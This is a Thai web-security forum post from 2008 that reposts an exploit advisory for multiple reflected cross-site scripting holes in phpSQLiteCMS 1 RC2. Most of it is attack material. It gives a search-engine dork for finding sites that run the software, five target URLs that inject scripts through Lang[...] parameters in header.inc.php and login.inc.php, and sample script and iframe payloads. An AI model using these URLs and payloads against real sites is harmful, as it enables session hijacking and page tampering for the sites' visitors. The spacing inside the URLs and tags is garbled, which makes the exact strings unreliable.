phpSQLiteCMS Multiple Remote XSS Vulnerability phpSQLiteCMS Multiple Remote XSS Vulnerability

TWD - ThaiWebDesign.org ชุมชนคนออนไลน์ Beta > Web Development > Web Security > phpSQLiteCMS Multiple Remote XSS Vulnerability

หน้า: [1]

phpSQLiteCMS Multiple Remote XSS Vulnerability

« เมื่อ: 24 พฤษภาคม 2008, 08:08:02 pm »

Global Mod.

kent_CM

Global Mod.

Newbie

กระทู้: 11

ความสบายใจ: 1

ออฟไลน์

ขอบคุณ

กล่าวไป: 1

รับมา: 13

30 มิถุนายน 2008, 02:54:23 pm

================================================== ========
phpSQLiteCMS Multiple Remote XSS Vulnerability
================================================== ========

AUTHOR: CWH Underground
DATE: 21 May 2008
SITE: www.citec.us

################################################## # # #
APPLICATION: phpSQLiteCMS
VERSION: 1 RC2 (Latest Version)
VENDOR: http://downloads.sourceforge.net/phpsqlitecms
################################################## # # #

DORK: "Powered By phpSQLiteCMS"

Exploit --- ---

โค๊ด:

[-] Http:// [target] / [phpsqlitecms_path] / cms / includes / header.inc.php? Lang [home] = <XSS>
[-] Http:// [target] / [phpsqlitecms_path] / cms / includes / header.inc.php? Lang [admin_menu] = <XSS>
[-] Http:// [target] / [phpsqlitecms_path] / cms / includes / header.inc.php? Lang [admin_menu_page_overview] = <XSS>
[-] Http:// [target] / [phpsqlitecms_path] / cms / includes / login.inc.php? Lang [login_username] = <XSS>
[-] Http:// [target] / [phpsqlitecms_path] / cms / includes / login.inc.php? Lang [login_password] = <XSS>

Example for XSS:
<script> Alert (123); </ script>
<iframe Src=http://www.google.com>
.

################################################## ################
Greetz: ZeQ3uL, BAD $ ectors, Snapter, Conan, Win7dos, JabAv0C
################################################## ################

« แก้ไขครั้งสุดท้าย: 24 พฤษภาคม 2008, 08:44:21 pm โดย kent_CM »

บันทึกการเข้า

Bad $ectors

"Imagination is important more than knowledge"

หน้า: [1]

กระโดดไป: